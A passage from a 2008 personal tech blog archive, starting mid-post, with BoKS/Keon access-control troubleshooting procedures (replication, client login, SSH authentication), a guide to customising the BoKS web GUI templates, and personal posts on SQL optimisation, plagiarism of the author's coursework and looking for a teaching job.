BoKS > lsbks -aTl *:$USER

The "lsbks" command lists information about a user. By using -a (all) and -T (access routes) you'll see everything you'll need to know. Hostgroup, userclass, uid/gid, is the account locked, when was the last login, and so on. You'll also see two lists of access routes: one for the individual user and one for his userclass.



3. Check for authentication methods

SSH is tricky insofar as it allows for (a combination of) multiple authentication methods. The most common are password, keyboard interactive and ssh_pk, aka key pair. The keyboard interactive method is actually forced by BoKS, thus disabling the "password" method, which isn't a problem at all since keyboard interactive -includes- password auth.

If the user's denied access it could be that the used authentication method isn't allowed. Per default, users have to use password authentication. In order to allow keypair authentication one has to set a particular flag on the account. This flag can be checked with either of these commands.

BoKS > authadm list -u *:$USER

BoKS > dumpbase -t31 | grep $USER

You'll notice the "must use" flag which indicates whether ssh_pk is optional or required. This value can be change using the -m and -M flags on the "authadm mod" command.



4. Check the user's SSH keypair

If the user is in fact making use of ssh_pk we should ensure that all relevant settings are correct.



5. Rare cases: further debugging

For those few cases that aren't solved by the aforementioned steps, there's a few other things we can try.



6. Scenarios and symptoms


kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: replication of the BoKS database

2008-11-21 21:08:00

If one or more of the replicas are out of sync, login attempts by users may fail if the BoKS client on the server in question happens to be talking to the out-of-sync replica. Other nasty stuff may also occur.

Standard procedure is to follow these steps:

  1. Check the status of all BoKS replicas.
  2. Check BoKS error logs on the master and the replica(s).
  3. Try a forced database download.
  4. Check BoKS replication processes to see if they are all running.
  5. Check the master queue, using the boksdiag fque -master command.
  6. Check BoKS communications, using the cadm command.
  7. Check node keys.
  8. Check the replica server's definition on BoKS database.
  9. Check the BoKS configuration on the replica.
  10. Debug replication processes.

All commands are run in a BoKS shell, on the master server unless specified otherwise.



1. Check the status of all BoKS replicas.

# /opt/boksm/sbin/boksadm -S boksdiag list

Since last pckt

The amount of minutes/seconds since the BoKS master last sent a communication packet to the respective replica server. This amount should never exceed a couple of minutes.

Since last fail

The amount of days/hours/minutes since the BoKS master was last unable to update the database on the respective replica server. If an amount of a couple of hours is listed you'll know that the replica server had a recent failure.

Since last sync

Shows the amount of days/hours/minutes since BoKS last sent a database update to the respective replica server.

Last status

Yes indeed! The last known status of the replica server in question. OK means that the server is running perfectly and that updates are received. Loading means that the server was just restarted and is still loading the database or any updates. Down indicates that the replica server is down or even dead.



2. Check BoKS error logs on the master and the replica(s).

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the replicas to see if you can detect any errors there. If the log file doesn't mention something about the hosts involved you should be able to find the cause of the problem pretty quickly.



3. Try a forced database download.

Keon> boksdiag download -force $hostname

This will push a database update to the replica. Perform another boksdiag list to see if it worked. Re-read the BoKS error log file to see if things have cleared up.
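For example, to push a fresh copy to the replica from the earlier examples and check the result (a sketch):

Keon> boksdiag download -force REPHOST
Keon> boksdiag list                          # re-check the replica's status
Keon> tail -20 /var/opt/boksm/boks_errlog    # and re-read the error log, as per step 2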



4. Check BoKS replication processes to see if they are all running.

Keon> ps -ef | grep -i drainmast

This should show two drainmast processes running. If there aren't you should see errors about this in the error logs and in Tivoli.

Keon> Boot -k

Keon> ps -ef | grep -i boks      # kill any remaining BoKS processes

Keon> Boot
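Once things are back up, a lazy way to keep an eye on the drainmast processes for a couple of minutes is a loop like this (sketch):

Keon> for i in 1 2 3 4 5 6 7 8; do ps -ef | grep -i [d]rainmast; echo ---; sleep 15; done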

Check to see if the two drainmast processes stay up. Keep checking for at least two minutes. If one of them crashes again, try the following:

Check to see that /opt/boksm/lib/boks_drainmast is still linked to boks_drainmast_d, which should be in the same directory. Also check to see that boks_drainmast_d is still the same file as boks_drainmast_d.nonstripped.

If it isn't, copy boks_drainmast_d to boks_drainmast_d.orig and then copy the non-stripped version over the boks_drainmast_d. This will allow you to create a core file which is useful to TFS Technology.

Keon> Boot -k

Keon> Boot

Keon> ls -al /core

Check that the core file was just created by boks_drainmast_d.

Keon> Boot -k

Keon> cd /var/opt/boksm/data

Keon> tar -cvf masterspool.tar master_spool

Keon> rm master_spool/*

Keon> Boot

Things should now be back to normal. Send both the tar file and the core file to TFS Technology (support@tfstech.com).



5. Check the master queue.

Keon> boksdiag fque -master

If any messages are stuck, there is most likely still something wrong with the drainmast processes. You may want to try restarting the BoKS master software. Do NOT reboot the master server itself! Restart the software using the Boot command. If that doesn't help, perform the troubleshooting tips from step 4.



6. Check BoKS communications, using the cadm command.

Verify that the BoKS communication between the master and the replica itself is up and running.

Keon> cadm -l -f bcastaddr -h $replica

If this doesn't work, re-check the error logs on the client and proceed with step 7.



7. Check node keys.

On the replica system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the configuration for the replica server, the keys have become unsynchronized. If you make any changes you will need to restart the BoKS processes, using the Boot command.



8. Check the replica server's definition on BoKS database.

Keon> dumpbase | grep RNAME | grep $replica

The TYPE field in the definition of the replica should be set to 261. Anything else is wrong, so you need to update the configuration in the BoKS database. Either that or have SecOPS do it for you.



9. Check the BoKS configuration on the replica.

On the replica system, review the settings in /etc/opt/boksm/ENV.



10. Debug replication processes.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate chapter of this manual for details.




kilala.nl tags: , ,

View or add comments (curr. 0)

BoKS troubleshooting: login and communications issues on the client

2008-11-21 21:04:00

The basics: verifying the proper functioning of a BoKS client

These easy steps will show you whether your new client is working like it should.

  1. Check the boks_errlog in $BOKS_var.
  2. Run cadm -l -f bcastaddr -h $client from the BoKS master (in a BoKS shell).
  3. Try to login to the new client.

If all three steps go through without error, your system is as healthy as a very healthy good thing... or something.



You can't log in to a BoKS client

Most obviously we can't do our work on that particular server and neither can our customers. Naturally this is something that needs to be fixed quite urgently!

  1. Check BoKS transaction log.
  2. Check if you can log in.
  3. Check BoKS communications
  4. Check bcastaddr and bremotever files.
  5. Check BoKS port number.
  6. Check node keys
  7. Check BoKS error logs.
  8. Debug servc process on replica server or relevant process on client.

All commands are run in a BoKS shell, on the master server unless specified otherwise.



1. Check BoKS transaction log.

Keon> cd /var/opt/boksm/data
Keon> grep $user LOG | bkslog -f - -wn

This should give you enough output to ascertain why a certain user cannot login. If there is no output at all, do the following:

Keon> cd /var/junkyard/bokslogs
Keon> for file in `ls -lrt | tail -5 | awk '{print $9}'`

> do

> grep $user $file | bkslog -f - -wn

> done

If this doesn't provide any output, perform step 2 as well to see if we sysadmins can log in.



2. Check if you can log in.

Pretty self-explanatory, isn't it? See if you can log in yourself.



3. Check BoKS communications

Keon> cadm -l -f bcastaddr -h $client



4. Check bcastaddr and bremotever files.

Login to the client through its console port.

Keon> cat /etc/opt/boksm/bcastaddr

Keon> cat /etc/opt/boksm/bremotever

These two files should match the same files on another working client. Do not use a replica or master to compare the files. These are different over there. If you make any changes you will need to restart the BoKS processes using the Boot command.



5. Check BoKS port number.

On the client and master run:

Keon> getent services boks

This should return the same value for the BoKS base port. If it doesn't, check either /etc/services or NIS+. If you make any changes you will need to restart the BoKS processes using the Boot command.



6. Check node keys

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the definition for the client server, the keys have become unsynchronized. Reset them and restart the BoKS client software. If you make any changes you will need to restart the BoKS processes using the Boot command.



7. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the client to see if you can detect any errors there. If the log file doesn't mention something about the hosts involved you should be able to find the cause of the problem pretty quickly.



8. Debug servc process on replica server or relevant process on client.

If all of the above fails you should really get cracking with the debugger. Refer to the appropriate chapter of this manual for details (see chapter: SCENARIO: Setting a trace within BoKS)

NOTE: If you need to restart the BoKS software on the client without logging in, try doing so using a remote management tool, like Tivoli.



The client queues are filling up or you can't communicate with the client

The whole of BoKS is still up and running and everything's working perfectly. The only client(s) that won't work are the one(s) that have stuck queues. The only way you'll find out about this is by running boksdiag fque -bridge which reports all of the queues which are stuck.

  1. Check if client is up and running.
  2. Check BoKS communications.
  3. Check node keys.
  4. Check BoKS error logs.

All commands are run in a BoKS shell, on the master server unless specified otherwise.



1. Check if client is up and running.

Keon> ping $client

Also ask your colleagues to see if they're working on the system. Maybe they're performing maintenance.



2. Check BoKS communications.

Keon> cadm -l -f bcastaddr -h $client



3. Check node keys.

On the client system run:

Keon> hostkey

Take the output from that command and run the following on the master:

Keon> dumpbase | grep $hostkey

If this doesn't return the definition for the client server, the keys have become unsynchronised. Reset them and restart the BoKS client software using the Boot command.



4. Check BoKS error logs.

This should be pretty self-explanatory. Read the /var/opt/boksm/boks_errlog file on both the master and the client to see if you can detect any errors there. If the log file doesn't mention something about the hosts involved you should be able to find the cause of the problem pretty quickly.

NOTE: What can we do about it?

If you're really desperate to get rid of the queue, do the following

Keon> boksdiag fque -bridge -delete $client-ip

At one point in time we thought it would be wise to manually delete messages from the spool directories. Do not under any circumstances touch the crypt_spool and master_spool directories in /var/opt/boksm. Really: DON'T DO THIS! It is unnecessary and will lead to trouble with BoKS.


kilala.nl tags: , ,

View or add comments (curr. 0)

No honor among peers: plagiarism is uncool

2008-11-19 20:57:00

T-Rex bullied someone into making his homework!

Well, this is certainly ironic... Not half a year ago my profs at college sang praise of the work I was doing and how helpful it was to publish my notes, calculations and papers on the web. This took a turn today when I received an e-mail from my mentor, asking me to remove all of my work from the web.

Apparently there is no honor among peers and there's a bunch of students that decided to be assholes and completely rip off my work. Of course it was never my intention to help people commit fraud at college. I have faith in my peers and counted on fellow students to have the balls to do their own work.

Publishing my schoolwork was always meant to be an inspiration for fellow students, possibly helping them along in their own pursuits. It'd be great if a glance or two at my work had helped them over that little bump they'd run into. I explicitly mention on my site that people shouldn't be dicks and that my work is not meant to be turned in as their own. I warn the readers that any repercussions following plagiarism of my work are their own responsibility and that I won't be held accountable for their assholish behaviour.

Anyway... It's dilemma time! I dislike the thought of hampering my old profs in their daily work. They made me feel at home at HU and they taught me a lot. On the other hand, I believe that removing my work from the web will only amount to fighting symptoms. Students will always share papers among themselves, it's just that mine are more visible. Besides, it's a very real possibility that at least a dozen students have already downloaded every single file I put up on the web, so it's impossible to stamp out any copying from my work.

I explained to my mentor that this high visibility of my work could also work in their advantage. If they'd consider using anti-plagiarism software like Ephorus, all the work turned in by students would be automatically checked against any papers findable through the web including mine.

I'll be honest and admit that having my work up on my site is also in part down to my sense of pride. I'm fscking proud of all the hard work I did last school year and I believe that my papers are also a testimony to my qualities in documentation and education. Call it my portfolio if you will.

I'll mull things over a bit and have another chat with my profs. Let's see if we can find some common ground in this.


kilala.nl tags: , , ,

View or add comments (curr. 2)

The BoKS/Keon users group is taking off!

2008-10-29 09:44:00

About a week ago I opened up the BoKS Access Control users group on LinkedIn.com. My goal was to unite BoKS/Keon admins from across the globe in order to build a tightly knit network in which we can all share our knowledge of BoKS.

The thing is, the way things are right now, there's hardly any information on the web about BoKS/Keon. First off "BoKS" is a four letter word, which makes it hard for Google to look for anything useful (especially since it keeps correcting it to "books"). Second, there's not that much on the web anyway! There's my website which has some real info and then there's the Fox Tech site which has general sales info. For some reason Fox Tech decided to hide all the manuals and in-depth stuff so only paying customers can get to the docs.

By building a professional network of BoKS users we finally know who to turn to for questions! LinkedIn allows us to post discussions inside our group and since folks from Fox Tech are also joining, we're bound to get some good answers!

Right now we're at 31 members but, since Fox has started advertising the group to their customers, I'm assuming we'll see a steady rise in members RSN(tm)!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Modifying the BoKS GUI

2008-10-20 08:10:00

In most cases the BoKS administration GUI serves its purpose. It's pretty spartan, though it can look a bit crowded at times. This isn't altogether that strange, as FoxT have used the same GUI layout for years on end. It's getting a bit long in the tooth.

Sometimes though you'll run into things that you'd like to do from the GUI, but which aren't implemented (yet). And that's where the hacking starts ^_^ In this article I'll go over the basic structure of the GUI's files and resources, explaining the function of each part. I'll also discuss a few of the changes we've made (or are contemplating) at $CLIENT.

Structure of the GUI files and resources

As is mentioned elsewhere, BoKS runs a custom webserver on ports 6505 and 6506 (default ports). This webserver gets started using the $BOKS_etc/boksinit.master script and, as the name implies, only runs on the master server.

All resources for the management GUI are stored in $BOKS_lib/gui. There you will find four subdirectories.

Keon> ls $BOKS_lib/gui

etc

forms

public

tcl

To start with, the public directory contains those few files that are accessible without having logged on. Naturally these files are limited to the various login screens, ie password/certificate/securid. Nothing more, nothing less.

The etc directory contains all the template files (.tmpl) that are used to create the GUI, as well as all of the image files. Most images are limited to the black banner at the top.

The forms directory consists of files and directories that form the menu structure of the GUI. There's a .menu file for each option in the main menu and a directory containing more .menu's for options that have sub-menus. This directory also contains all of the .form files that are used to enter or edit information.

Finally, the tcl directory contains the TCL code that does the actual work. Whenever you've edited a form to update information in the database, this code gets used to perform the actual modifications.
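
By the way, if you're not sure which of these files produces a particular page or string, a simple search through the GUI tree usually points you in the right direction. A rough sketch (the search string is only an example):

Keon> find $BOKS_lib/gui -type f -exec grep -l "Welcome to FoxT BoKS" {} \;

This lists every template, form and TCL file that mentions the string, which is handy once you start modding.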

Including the domain name in the banner

One of the first mods that I wanted to make to our GUI was to include the names of the BoKS domain and the master/replica server in the black banner of each page. That way it would be impossible to mix up in which domain you're working, thus lowering the chance of FUBARs. Later on I also decided it would be a good idea to include the domain name in each page's title. Of course this mod isn't as useful if you're only running one domain.

To make the desired changes we'll need to edit a number of .tmpl files in $BOKS_lib/gui/etc/eng. The changes we'll be making are along these lines.

Original:

<html>

<title>

Welcome to FoxT BoKS

</title>

<body><body TEXT="000000" LINK="#0000FF" ALINK="#0000FF" VLINK="#0000FF">



<table bgcolor="black" width="100%">

<tr><td align="center"><IMG SRC="@PUBLIC@/eng/figs/welcome.gif" alt="Welcome to FoxT BoKS"></td></tr>

</table>

Modified:

<html>

<title>

CAT DOMAIN: Welcome to FoxT BoKS

</title>

<body><body TEXT="000000" LINK="#0000FF" ALINK="#0000FF" VLINK="#0000FF">



<table style="color: #FFFFFF;" bgcolor="black" width="100%">

<tr><td align="center"><IMG SRC="@PUBLIC@/eng/figs/welcome.gif" alt="Welcome to FoxT BoKS"></td></tr>

<tr><td align="center">CAT DOMAIN, running on master server <i>Andijvie</i></td></tr>

</table>

As you can see, all I did was slightly modify the TITLE tag and I've added an additional row to the banner table. I've also tweaked the text colour in the banner, so it's not black on black.

The abovementioned changes need to be made in all of the .tmpl files on the master server. If you like, you could also make the mods on the replica servers, assuming that you may at one point in time need to failover to one of them. You never know when the master server might croak.
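
If you don't feel like editing every template by hand, the title change at least can be scripted. This is only a sketch: it assumes a GNU or BSD style sed, that the title text sits on its own line right below the <title> tag (as in the snippet above) and that you keep the .orig copies around until you're happy with the result.

cd $BOKS_lib/gui/etc/eng
for FILE in *.tmpl; do
    cp "$FILE" "$FILE.orig"
    sed '/<title>/{n;s/^/CAT DOMAIN: /;}' "$FILE.orig" > "$FILE"
done

The extra banner row with the master server's name is best added by hand, so you can eyeball each template's table while you're at it.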


kilala.nl tags: , ,

View or add comments (curr. 4)

Keeping your Mac OS X applications up to date

2008-08-27 21:57:00

It's an obvious fact that I love Apple's Mac OS X. There's one feature though that's missing from OS X that I'd love to see implemented properly. So far, the guys who made App Fresh are doing great work in achieving this feature!

The feature in question: centralised updates for all the installed applications and prefpanes.

On my Macbook I have at least fifty different apps installed, each of which has its own way of getting updates. Some software packages, like Adium and iTerm, do automatic checks on their webservers and allow you to immediately install an update. Others, like Transmit and Unison, check for updates but require you to manually download and install a new version. It's all a bit hodge-podge. So how about we strive for a unified method of upgrading our software?

Enter the aforementioned AppFresh. After a brief configuration, AppFresh will search your hard drive for applications. Then, using the IUseThis.com database, it checks for new versions of your software and where to download them. Give AppFresh the order and he'll download and install all the updates in one fell swoop! Great!

Of course, such a course of action should only be used in production environments after testing all the new software versions. I also haven't checked yet, but I'm curious to see if you can point AppFresh at your own software repository. That way you could build your own, centralised software repo for your company. Possibilities!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Dabbling with SQL

2008-07-17 08:46:00

Bwahah, this is priceless :D

Yesterday I'd spent an hour or two writing a PHP+SQL script for one of my colleagues, so he could get his hands on the report he needed. We have this big database with statistics (gathered over the course of a year) and now it was a matter of getting the right info out of there. Let's say that what we wanted was the following:

For four quarters, per host, the total sum of the reported sizes of file systems.

Now, because my SQL skills aren't stellar, what I did was create a FOR-loop on a "select distinct" of the hostnames from the table. Then, for each loop instance I'd "select sum(size)" to get the totals for one date. But because we wanted to know the totals for four quarters, said query was run four times with a different date. This means that to get my hands on said information I was running 168 * 4 = 672 queries in a row. All in all, it took our box fifteen minutes to come up with the final answer.
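
In shell terms the old approach boiled down to something like this. Purely a sketch of the idea, not the actual PHP; the mysql client invocation and the database name (statsdb) are assumptions for illustration, only the vdisks table, its columns and the four dates come from the real setup:

for HOST in $(mysql -N -e 'SELECT DISTINCT hostname FROM vdisks;' statsdb); do
    for QDATE in 2007-10-03 2008-01-01 2008-04-01 2008-07-01; do
        mysql -N -e "SELECT SUM(size) FROM vdisks WHERE hostname='$HOST' AND date='$QDATE';" statsdb
    done
done

Every one of those 672 queries most likely walks the whole table, hence the fifteen-minute runtime.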

On my way to work this morning a thought struck me: I really ought to be able to do this with four queries, or even with -one-! What I want isn't that hard! And in a flash of insight it came to me!

SELECT hostname, date, SUM(size) AS total FROM vdisks WHERE (date="2007-10-03" OR date="2008-01-01" OR date="2008-04-01" OR date="2008-07-01") GROUP BY hostname, date;

The runtime of the total query has gone from 15 minutes, to 1 second. o_O

Holy shit :D I guess it -does- pay to optimize your queries and applications!


kilala.nl tags: , , ,

View or add comments (curr. 0)

That, as they say, was that

2008-06-23 20:54:00

*sigh* That was it...

Today I had my last two exams of this school year and, barring any mishaps, I won't have to redo them. Meaning that now my college career is officially over... For now. *sniffle* I'll definitely miss it.

Ah... *stretch* I'll be back in a few years; no doubt about that. Now! Off to do some work around the house!


kilala.nl tags: , ,

View or add comments (curr. 4)

All my term papers for History 2 (Geschiedenis 2 - Vakgedeelte)

2008-06-19 21:37:00

One of the few second year's courses that I got out of the way in my first year at college is History 2, ie Geschiedenis 2 - Vakgedeelte. I'd planned on leaving the didactical part of the course until the next year.

The workload for this course isn't that high and it mostly depends on the students reading a whole book on the history of mathematics. Starting at the arithmetic of the Egyptians and Babylonians we proceed through India, Arabia, the middle ages and the Renaissance to discover how maths evolved through the ages. Surprisingly most of the really interesting stuff starts around the seventeenth century. -Astoundingly-, over 90% of the maths we know was invented after 1900. o_O



Biography of Euclid

As part of the preparations for our exam, each student was asked to write a two page biography of a famous mathematician. I was assigned Euclid (Euclides in dutch).

This document is available as a .PDF document and can be downloaded here.



Summary of "Math through the ages"

This course relies on a syllabus made by the Hogeschool and the Math through the ages book by Berlinghoff and Gouvea (Amazon.com). Since the book's rather voluminous I reckoned I'd write a summary of the whole thing, with some stuff from the syllabus thrown in.

This document is available as a .PDF document and can be downloaded here.



Assignments 7.3 through 7.6

One of the minor assignments we were given was to work out a few ancient, dutch math assignments. Well, "ancient"? More like sixteenth or seventeenth century stuff. It was actually fun to try and decipher the instructions given in the original texts.

This document is available as a .PDF document and can be downloaded here.


kilala.nl tags: , , , ,

View or add comments (curr. 0)

It's great to know one's work is appreciated

2008-06-03 15:05:00

Fuckin' A, man!

As the title of this post says: it's great to know that at least there's -someone- out there who appreciates the work you do :)

Case in point: I've been putting all my college term papers and summaries online and I've been keeping an extensive Wiki with class notes. From time to time a teacher or classmate will suggest that they've had some use for these sites, which is of course quite nice. But last night the aforementioned guidance counselor told me something that made me really happy ^_^

Next year she'll be teaching the second year's General didactics course. Because the course is currently given by one of our somewhat wishy-washy teachers, she was told that she'd have to hunt around and ask people for all the materials. I guess that most of the stuff was never really put to paper. Luckily Lisette knew about my site, found my summary and class notes and was done within a day. Her supervisor was perplexed! :D

So yeah, it's great to know that you're appreciated ^_^


kilala.nl tags: , , ,

View or add comments (curr. 2)

An exciting week up ahead!

2008-06-01 20:16:00

Little D, having a hard time sleeping. Courtesy of sinfest.net.

Man o man, is this week going to be exciting and busy! ^_^

For starters, tomorrow will be completely jam-packed! I'll start off with a morning at one of the schools I'm interviewing with, to get a taste of their atmosphere. After our very pleasant meeting two weeks ago, we wanted to make sure that I like the school well enough before getting down to real business.

I'll then head off to school, which lasts from 1200 until 2000, mixing three different courses with a small project that we're working on. After that I'll meet up with my ever-so lovely guidance counselor, to have a chat about my progress at school. She's been of great help to me this year and I think we can both be pleased with the progress I've made. :)

Tuesday, Thursday and Friday will be spent at the office, doing what we always do :) I'm working on a rather important project, which consists mostly of paperwork, to ensure the SOX compliance of $CLIENT.

Wednesday will be a rather special day... I've taken the full day off from work (man, school is really cutting into my vacation hours!), to tackle no less than three interviews!

In the morning I'll visit a school here in Utrecht. They're pretty big on that New Learning thing and I'm quite interested to see how their school works. My classmate Badegul has told me a little about their school and they seem like a rather interesting lot! They're right up to date when it comes to modern teaching methods.

Around lunch I'll pay a visit to Red Five in Woerden. They're the software developers and hosting company behind most of Ephorus' products. I spoke to Ephorus' director a few weeks ago and he set up a meeting for me at Red Five. Maybe I'll be able to provide some consulting on the side for these guys, while I'm working in education. Who knows? ^_^

Finally, in the late afternoon, I'll have a second job interview at a school in Maarsbergen. They only focus on the VMBO level of high school education, meaning that they're geared towards getting kids ready for blue collar jobs and the service industry. Their school seems very nice, in that it's a bit small and everyone's acquainted. Also, their school's located in an old monastery in the middle of the woods. How cool is that?!

Finally, finally, next weekend will be Snow's annual summer get-together. This year, the whole company will gather on Texel (one of the islands on the dutch coast) to have some fun in the sun and sand. A whole bunch of them are going skydiving, but I opted to take along my homework and to ride my bike around a little bit.

So! Busybusybusy! But I'm actually feeling quite well under all the stress! ^_^


kilala.nl tags: , ,

View or add comments (curr. 3)

Interviewing at regional high schools

2008-05-22 21:49:00

Today I took a few hours off from work, so I could go out for an interview at Oosterlicht College high school. I'd seen on their website that they were looking for math teachers and thought I ought to give it a whirl.

Their school is quite large, with around 1800 students at their main location, but I've heard good stuff about them. Besides, the school's been divided into two virtual departments, meaning that I'll only interact with about half of that number of students. In this case the job I'm shooting for is part of the VMBO track (the bottom of three ranks in the dutch high school system).

I had a nice talk with the section chief and the head of the maths team, which lasted for about 75 minutes. I think they were at least moderately interested in having me on their team and we agreed that I'd come and observe the school in full swing RSN(tm). If, after those few hours, I'd still like to work at the OC, then we'll have our official talk about the terms and such. So far, things are looking good :)

I was also reassured that, as a teacher, I wouldn't have to earn a lot less than what I'm getting right now. In the dutch educational system (primary and high school), personnel is divided into four salary groups: LA, LB, LC and LD. As a high school teacher I'd rank in LB, meaning that I'd start out at 2250 euros a month. However, since most schools are willing to match your current paycheck if you're leaving another field, I'd be making more. This would put me over halfway up the salary scale for the LB class. In the end, this means that I won't be taking a pay cut, but that there is definitely less room for me to grow in the future.

Anywho... I'm quite excited about my first interview in the educational system! I was a bit anxious before we got started, but I soon felt at ease. It was just like any other interview I'd been to. Just a bit friendlier and for once I wasn't the stronger party :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

"Banenmarkt", what an afternoon

2008-05-14 21:08:00

Wow, I am -beat-! =_=

The 1.5 hours I spent at the Banenmarkt at college really took its toll on me :) It was a great gathering and I just barely managed to speak to everyone I wanted to within the time limit.

I dropped off a total of eight resumes, spoke to reps of eleven schools and have a few very good prospects. I also spoke with folks from three other educational organisations and their information was rather valuable as well (such as the perfectly swank Het Utrechts VO in kaart booklet).

A few reps seemed moderately positive about my suggestion of combining a teaching position/internship, with a full-time supporting role at their school. So that's a good sign :)

Right now, while I am still capable of forming coherent sentences, I'm making sure I get all their contact info into my address book, so I can't lose it. After that I'm off to bed... I need some sleep...


kilala.nl tags: , , ,

View or add comments (curr. 0)

"Banenmarkt" at Hogeschool Utrecht

2008-05-14 09:27:00

A blouse, my resume and some calling cards.

An ironed shirt, a stack of resumes and a pouch of calling cards... This can only mean one thing! We're going networking again! ^_^

Today my department in college (hint: the .edu dept) is holding its annual banenmarkt; call it a "career day" if you will. For about three hours, students will get a chance to talk to reps from all kinds of high schools in our region. The objective, of course, is to get your foot in the door for an internship or a teaching position.

As I mentioned earlier, I'm on the lookout for a real teaching position. I need the experience and I'm anxious to try my hand at a steady teacher's job. So, while I will definitely grasp any internships I can get, I will be on the prowl for fulltime jobs. Or at least to get my name out there.

This is going to be interesting! :)


kilala.nl tags: , ,

View or add comments (curr. 2)

Richard Fitzpatrick - "Euclid's elements of geometry"

2008-05-06 21:51:00

One artist's rendition of Euclid

A few weeks ago I wrote about my research on Euclid, the ancient Greek mathematician. Said research wasn't anything noteworthy, just something to form a basis for a biography written for a school assignment.

Back then I also wrote about a man called Richard Fitzpatrick and his remarkable work. You see, Mr Fitzpatrick took a nineteenth century translation of the Elements of geometry by Euclid and reworked it into a new book. Each page of this book is split in two: one column with a greek text closely approaching the greek original and one column with a modern english translation. While the greek text doesn't add much for the budding mathematician, it does add a definite factor of "cool" ^_^

Mr Fitzpatrick's book can be downloaded for free as a PDF, but you can also buy a printed version from Lulu.com. Lulu.com allows you to publish your own books at a very low price, which many academics and aspiring authors put to good use. $27 (including S&H) bought me a beautiful, hard cover book with an accessible translation of Euclid's Elements. The sleek, black cover looks quite nice and the fact that the book is printed on A4 paper makes it very easy to read.

Now... I shot some video while leafing through the book, just to give you an impression. The video came out a bit blurry, but that's what I get for using my compact camera under fluorescent lighting ^_^;

Euclid.mov


kilala.nl tags: , , , ,

View or add comments (curr. 0)

Holy wars, every profession has them

2008-04-30 12:46:00

Whenever two or more parties are convinced that they're on the side of absolute right, holy wars pop up. I'm not just talking about the religious conflicts that we see every day, but also about professional debates that verge on religion.

Windows versus Linux versus Mac OS X. Emacs versus Vi versus Pico. Sendmail versus just about any decent email server. Japanese cars versus American cars versus European cars. Ketchup-on-your-steak versus Ketchup-lovers-should-die. Whatever, there's too much to even think of!

The field of education unfortunately is no different. Many people think that they know what's best for today's kids and thus philosophies about teaching vary greatly! For example, in December I wrote about the Het nieuwe leren versus Het oude leren crowds. The former think that the folks over at BON are decrepit relics from a time better forgotten. The latter think that the HNL crowd are nonsensical managers lusting for new and shiny toys. And neither side is willing to give in one inch, or to even concede that the other side has at least -some- merit.

Great.

One of the stories that's recently been snapped up by the BON-folks is the story of Jan Verhoeven's family and their experiences with De Nieuwste School in Tilburg (The Newest School). While the Verhoevens are actually quite content in their role as chroniclers, the two battling sides seize any chance to duke it out. The BON-ers ragged on the school on their fora, in their usual fashion. At the same time the DNS-folks grasp at any chance to portray themselves in an overly positive fashion, by grabbing media attention and by spawn camping the relevant Wikipedia pages. So instead of working on a real solution, both sides are just too fscking concerned with their little battles.

Very productive, que no?

Me, I'm just glad that the Verhoevens are alright and that their daughter's happy at her new school after getting out of De Nieuwste School.


kilala.nl tags: , , ,

View or add comments (curr. 8)

It's official: I'm job hunting as a teacher

2008-04-28 18:16:00

As the title suggests: I've officially started hunting for teaching positions for next school year. So far I've found a few very interesting schools that are actually quite close to home!

Let's see how this pans out.

Any of you Snowers reading this: no need to fret yet. I'm NOT running out on you on a moment's notice ;)


kilala.nl tags: , , ,

View or add comments (curr. 3)

Networking for fun and profit

2008-04-28 13:36:00

Until recently I used to hate networking, the perceived obligation to talk business with people whom I had no interest in. Over the past year or so a realisation has been growing in me though: networking is something that happens automatically, to a certain degree. And you can make the parts that need to happen consciously as fun as they need to be.

Example 1: Like many young folks in IT I hated the idea of networking and actually tried to avoid it. I reckoned that I had no network whatsoever and didn't care about it that much either. However, after eight years of working in IT I realised that I -do- have a network and that it's rather expansive! My friend/colleague Deborah recently nudged me to get onto Linked In and I managed to map out a large part of my network with minor effort. That's 150 names right there, that I can tap into if I ever need help with my job, a technical question, or whatever. In case you're curious, here's my profile.

So yes, everyone has a network. Even you. All the people you have worked with, or for? Network! All the friends you made at that IT conference? Network! And so on...

Example 2: Sometimes you stumble upon stuff that piques your interest. Case in point, I recently poked around in and wrote a review about Ephorus. The product is Europe's leading anti-plagiarism software and both the teacher and the sysadmin in me got curious as to its workings. I managed to get my hands on a trial account (not normally given to students) and tried it out. I liked it well enough.

Then a few days later followed an e-mail from their director, asking if I'd like to come in for a talk. We had a great chat this morning, about Ephorus, about my work, about their work and just stuff in general. I had a great time and I even got a few -very- helpful suggestions that could help my career in the near future.

So you see? Networking consists of two things: the stuff you do every single day and just shooting the breeze with people you don't know. The third part, the obligatory marketing talks with possible customers, I'll leave to the sales folks ~_^


kilala.nl tags: , , ,

View or add comments (curr. 1)

All of my term papers for Analysis 1 (Analyse 1 - Didactiek)

2008-04-21 09:28:00

Analysis 1 - Didactics is one of the larger projects that the first year's students have to tackle. There are ten reports to be made, some of them rather largeish. To us the project is known as Analyse 1 - Didactiek - Rekenen is complex. Analysis in this case is the dutch name for what is known in the english speaking world as Calculus.

In short, this course focusses on the learning of arithmetic and math. We'll take close looks at the various algorithms that children need to learn and we'll even try and re-learn arithmetic ourselves by doing it all in Base-8 (octal). I found this class particularly challenging, mostly due to the pressure of having to hammer out these reports so quickly. All in all I did well though, since I managed to score a 90% at the end of the term :)



Dossieropdracht 1

Students are asked to re-learn arithmetic by doing it all in Base-8, instead of in Base-10. This way we would be forced to study addition, subtraction, multiplication and division like we were twelve year olds again. This was great fun! We also examined multiple methods to do multiplication.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 2

All of us are studying to become math teachers in high school, so it's only natural for us to focus on maths for teenagers. However, it is also a very interesting exercise to examine mathematics education in primary and middle school. Using reports made by CITO called the PPON (Periodieke Peiling Onderwijs Niveau, more information here), we are asked to investigate the level of math knowledge at the end of primary school (K8 in the USA). We are also asked to search for any problem areas that our teenagers may have encountered in their education.

This document is available as a .PDF document and can be downloaded here.



Dossieropdracht 3

